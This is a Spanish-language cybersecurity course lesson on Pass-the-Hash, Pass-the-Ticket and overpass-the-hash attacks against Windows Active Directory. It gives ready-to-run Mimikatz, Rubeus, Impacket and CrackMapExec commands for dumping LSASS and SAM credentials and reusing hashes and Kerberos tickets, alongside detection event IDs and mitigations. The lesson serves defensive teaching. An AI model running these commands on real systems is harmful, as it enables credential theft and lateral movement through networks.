Cyber Security Academy · Lección

Ataques Pass-the-Hash y Pass-the-Ticket

Utilice hashes de credenciales y tickets de Kerberos para desplazarse lateralmente sin conocer las contraseñas en texto plano.

Lección 2 de 413 pasos

Ataques Pass-the-Hash y Pass-the-Ticket es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 2 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.

Por qué existen estos ataques

Los protocolos de credenciales de Windows almacenan secretos de autenticación (hashes NTLM y tickets de Kerberos) en la memoria. Un atacante con privilegios de SYSTEM puede extraer estos secretos y reutilizarlos para autenticarse como otros usuarios sin conocer sus contraseñas.

Extracción de hashes NTLM con Mimikatz

Mimikatz es la principal herramienta de extracción de credenciales en Windows. Al ejecutarse como SYSTEM/Administrator, lee la memoria del proceso LSASS para extraer hashes NTLM y credenciales en texto claro.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

Pass-the-Hash (PtH) con Mimikatz

PtH inyecta un hash NTLM en una sesión nueva sin conocer la contraseña en texto claro. El hash autentica la sesión en servicios remotos mediante NTLM, lo que resulta eficaz para el movimiento lateral hacia otros hosts Windows.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

Pass-the-Hash con Impacket

Impacket proporciona herramientas Python para PtH: psexec.py, smbexec.py y wmiexec.py aceptan hashes NTLM directamente para ejecutar comandos de forma remota.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

Extracción de tickets de Kerberos

Los tickets de Kerberos también se almacenan en la memoria de LSASS. Mimikatz los extrae; Rubeus es la herramienta especializada para operar con tickets de Kerberos en Windows.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

Pass-the-Ticket (PtT)

PtT inyecta un ticket de Kerberos robado en la sesión actual. El ticket permite autenticarse en servicios como su propietario original; no se necesita ningún hash ni contraseña.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

Volcado remoto de LSASS

Desde un punto de apoyo, realice un volcado remoto de LSASS mediante CrackMapExec o secretsdump de Impacket; no se necesita una sesión interactiva en el destino.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

Rutas de movimiento lateral

Después de obtener hashes o tickets, desplácese lateralmente: use PtH en otras máquinas aprovechando la reutilización de cuentas de administrador local, use PtT para acceder a servicios del dominio y avance hacia el control de administrador del dominio atacando cuentas privilegiadas.

Detección de PtH y PtT

Los defensores detectan PtH mediante el Event ID 4624 (inicio de sesión) con el tipo de inicio de sesión 3 y sin un inicio de sesión interactivo correspondiente, anomalías en la autenticación NTLM y firmas de Mimikatz en memoria o en disco.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

Mitigaciones

Medidas de mitigación clave: habilite Credential Guard (protege LSASS mediante virtualización), restrinja la reutilización de cuentas de administrador local entre máquinas (LAPS), exija el grupo Protected Users para las cuentas privilegiadas y deshabilite NTLM siempre que sea posible.

Overpass-the-Hash

Overpass-the-Hash convierte un hash NTLM en un TGT de Kerberos. Esto resulta útil en entornos donde NTLM está bloqueado pero Kerberos está disponible, o cuando necesita un TGT para realizar otros ataques contra Kerberos.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

Comprobación rápida

¿Qué función de seguridad de Windows protege el almacenamiento de credenciales de LSASS mediante virtualización?

Resumen: PtH y PtT

Pass-the-Hash y Pass-the-Ticket son la base del movimiento lateral en Active Directory. Ambos explotan el almacenamiento en caché de credenciales de Windows en LSASS. Mimikatz e Impacket hacen que la extracción y reutilización sean triviales. Defiéndase mediante Credential Guard, LAPS, el grupo Protected Users y una supervisión estricta de los eventos de autenticación NTLM y Kerberos.

Gratis para empezar

Aprende Cyber Security Academy con un tutor de IA — gratis

Escribe y ejecuta código real en tu navegador, obtén ayuda instantánea de un tutor de IA disponible 24/7 y continúa donde lo dejaste en la web o en la aplicación.

Cursos
76
Lecciones
303

Preguntas frecuentes

¿La lección «Ataques Pass-the-Hash y Pass-the-Ticket» es gratis?

Sí — el texto completo de «Ataques Pass-the-Hash y Pass-the-Ticket» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.

¿Qué aprenderé en «Ataques Pass-the-Hash y Pass-the-Ticket»?

Utilice hashes de credenciales y tickets de Kerberos para desplazarse lateralmente sin conocer las contraseñas en texto plano. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.

¿Necesito experiencia previa para empezar Cyber Security Academy?

No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 2 de 4.

¿Cuánto tiempo toma la lección «Ataques Pass-the-Hash y Pass-the-Ticket»?

La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.

¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?

Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.

Todas las lecciones de este curso

  1. Autenticación de Windows: NTLM y Kerberos
  2. Ataques Pass-the-Hash y Pass-the-Ticket
  3. Kerberoasting y AS-REP Roasting
  4. Refuerzo de Active Directory
← Volver a Cyber Security Academy